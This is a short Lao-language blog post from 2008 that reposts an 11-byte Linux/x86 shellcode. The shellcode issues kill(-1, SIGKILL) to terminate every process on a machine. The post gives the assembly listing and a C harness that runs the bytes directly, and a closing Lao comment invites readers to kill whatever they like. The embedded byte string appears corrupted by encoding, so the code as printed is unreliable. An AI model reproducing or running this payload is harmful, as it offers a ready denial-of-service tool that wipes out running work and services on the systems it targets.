
ຂຽນເມື່ອ: Apr. 12, 2008
| ມີ
2 ຄຳເຫັນ
ແລະ
0 trackback(s)
/* By Kris Katterjohn
*
* 11 byte shellcode to kill all processes for Linux/x86
*
*
*
* section .text
*
* global _start
*
* _start:
*
* ; kill(-1, SIGKILL)
*
* push byte 37
* pop eax
* push byte -1
* pop ebx
* push byte 9
* pop ecx
* int 0x80
*/
main()
{
char shellcode[] = "j%Xjÿ[j YÍ";
(*(void (*)()) shellcode)();
}
//ຢາກເອົາໄປຂ້າຫຍັງກະຂ້າ